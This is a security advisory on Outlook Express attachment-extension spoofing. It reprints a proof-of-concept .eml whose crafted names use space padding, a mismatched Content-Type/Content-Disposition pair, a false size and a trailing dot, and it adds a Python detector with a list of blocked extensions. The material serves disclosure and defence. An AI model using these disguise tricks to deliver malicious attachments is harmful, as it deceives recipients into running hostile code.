Microsoft Outlook Express File Extension Spoofing Vulnerability
Published: 2002-07-20
Updated: 2002-07-26
Affected systems:
Microsoft Outlook Express 6.0
Microsoft Outlook Express 5.5
Microsoft Outlook Express 5.0
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
Description:
BUGTRAQ ID: 5277
Microsoft Outlook Express is a popular e-mail client developed by Microsoft.
Outlook Express does not correctly handle the file-name extension of an attachment. A remote attacker can exploit this to disguise an attachment's extension and lure the target user into opening it.
When an attachment's file name contains extra characters (for example a long run of spaces) between the displayed name and the real extension, Outlook Express applies its extension restrictions to the wrong part of the name. An attacker can use this to make a .exe attachment appear to carry a harmless .txt extension; if the user opens the disguised .exe without suspicion, the malicious code it contains runs on the user's system.
<*Source: Matthew Murphy (mattmurphy@kc.rr.com)
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
From: "Matthew Murphy" <mattmurphy@kc.rr.com>
Subject: E-mail
Date: Fri, 19 Jul 2002 23:37:23 -0500
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_007F_01C22F7D.412A3DA0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
This is a multi-part message in MIME format.
------=_NextPart_000_007F_01C22F7D.412A3DA0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
This is a sample .EML exploiting several security issues
in Outlook Express 6.0.
1) Note the file attachment name overflow in the attachment list.
If a user specifies a VERY LONG attachment name, the attachment is
truncated in the "Attachments:" listbox.
NOTE: The number of spaces may require some precision work, so
test often until you get the right number! :-)
2) Note how a .CHM file bypassed the malicious application filter.
Normally, a user would not be allowed to open such a file, and the
file would be disabled by the MUA. However, by using a mismatched
Content-Type/Content-Disposition pair, the filter allows access to
the potentially dangerous CHM file type.
3) Note how the "Open Attachment Warning" dialog displays the filename
when opening the file. The incredibly long ending that we used to
spoof the attachments list is not even displayed, worse, the file name
could inaccurately be displayed as non-malicious (e.g., ASX as here)
4) Note how a specially crafted attachment name allows us to not only
spoof the name in the listbox, but also the size. As the user does
not see the size of the attachment, we can fix this member to a false
value. A typical use for this would be to make the file appear smaller
(safer?) than it really is.
5) Note how the icon is the typical default icon if a "." character is
appended to the end of the filename. OE doesn't parse past the extra
dot, although Windows does.
------=_NextPart_000_007F_01C22F7D.412A3DA0
Content-Type: application/octet-stream;
name="NewTitle.asx (132 KB)"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
filename="NewTitle.asx (132 KB)"
This is not a real CHM file, just for the sake of demonstration!
------=_NextPart_000_007F_01C22F7D.412A3DA0
Content-Type: text/plain;
name="ATT00119.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
filename="ATT00119.txt"
------=_NextPart_000_007F_01C22F7D.412A3DA0--
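The script below is an added example, not part of the original advisory or of Matthew Murphy's proof of concept. It parses a constructed .eml with Python's standard email module and flags the attachment-name tricks that the description and the proof of concept above rely on: padding spaces between a decoy extension and the real one, a Content-Type name that disagrees with the Content-Disposition filename, an executable extension declared as a text type, and a trailing dot that stops the client's parser but not Windows. The sample message, the assumed 24-character width of the attachment list box and the list of blocked extensions are assumptions made for this example.

```python
"""Flag attachment names crafted to fool a mail client's extension filter or
its truncating "Attachments:" list box.  Added example: the sample message,
the assumed 24-character display width and the blocked-extension list are
constructed for this demonstration, not taken from the advisory."""
import email
import re

# Assumption: a small set of extensions a mail client would refuse to open.
DANGEROUS_EXTS = {"exe", "chm", "scr", "pif", "com", "bat", "cmd", "vbs", "js", "hta"}

PAD = " " * 60  # padding that pushes the real extension out of the list box

# Constructed sample message: one body part and four attachments.
SAMPLE_EML = f"""\
From: sender@example.com
To: victim@example.com
Subject: constructed sample
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/plain; charset="us-ascii"

Body text.
--BOUNDARY
Content-Type: application/octet-stream; name="invoice.txt{PAD}.exe"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="invoice.txt{PAD}.exe"

MZ... (not a real executable)
--BOUNDARY
Content-Type: text/plain; name="notes.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="notes.chm"

ITSF... (not a real help file)
--BOUNDARY
Content-Type: application/octet-stream; name="setup.exe."
Content-Disposition: attachment; filename="setup.exe."

MZ... (not a real executable)
--BOUNDARY
Content-Type: image/jpeg; name="photo.jpg"
Content-Disposition: attachment; filename="photo.jpg"

(not a real image)
--BOUNDARY--
""".encode()


def real_extension(name):
    """Extension Windows will act on: Win32 drops trailing dots and spaces
    when it creates the file, so "setup.exe." lands on disk as "setup.exe"."""
    trimmed = name.rstrip(". ")
    return trimmed.rsplit(".", 1)[1].lower() if "." in trimmed else ""


def displayed_extension(name, width=24):
    """Extension a user sees when a list box shows only the first `width`
    characters of the name (assumed width)."""
    shown = name[:width].rstrip()
    return shown.rsplit(".", 1)[1].lower() if "." in shown else ""


def analyze(raw, width=24):
    """Return one finding per attachment: its name, the extension that is
    shown, the extension that is real, and the reasons it looks spoofed."""
    msg = email.message_from_bytes(raw)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ct_name = part.get_param("name")  # Content-Type name=
        cd_name = part.get_param("filename", header="content-disposition")
        if ct_name is None and cd_name is None:
            continue  # the message body, not an attachment
        name = cd_name or ct_name
        real, shown = real_extension(name), displayed_extension(name, width)
        reasons = []
        if real in DANGEROUS_EXTS:
            reasons.append(f"real extension .{real} is executable content")
        if shown and shown != real:
            reasons.append(f"list box shows .{shown} but the file is .{real}")
        if re.search(r"\s{2,}", name):
            reasons.append("whitespace padding inside the file name")
        if name != name.rstrip(". "):
            reasons.append("trailing dot/space after the extension")
        if ct_name and cd_name and ct_name != cd_name:
            reasons.append("Content-Type name differs from Content-Disposition filename")
        if part.get_content_maintype() == "text" and real in DANGEROUS_EXTS:
            reasons.append("executable extension declared as a text type")
        findings.append({"name": name, "shown_ext": shown,
                         "real_ext": real, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EML):
        status = "SUSPICIOUS" if f["reasons"] else "ok"
        print(f"{status:10} {f['name'].strip()!r}: " + "; ".join(f["reasons"]))
```

The check deliberately derives the real extension from the full name after stripping trailing dots and spaces, because that is what Windows does when it writes the file, and compares it with the prefix a truncating list box would show; a mail gateway or client that judges attachments by the displayed prefix, or by the Content-Type name alone, misses all four cases the sample carries. The display width is a simulation of a fixed-width list box, not a measurement of Outlook Express.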
Recommendations:
Temporary workaround:
If you cannot install a patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:
* Do not open attachments sent by others without checking them first.
* Do not trust the name shown in the "Attachments:" list box: the real extension is the text after the last dot of the full file name, which may be hidden behind padding spaces or followed by an extra dot that Windows ignores.
Vendor patch:
Microsoft
---------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:
http://www.microsoft.com/technet/security/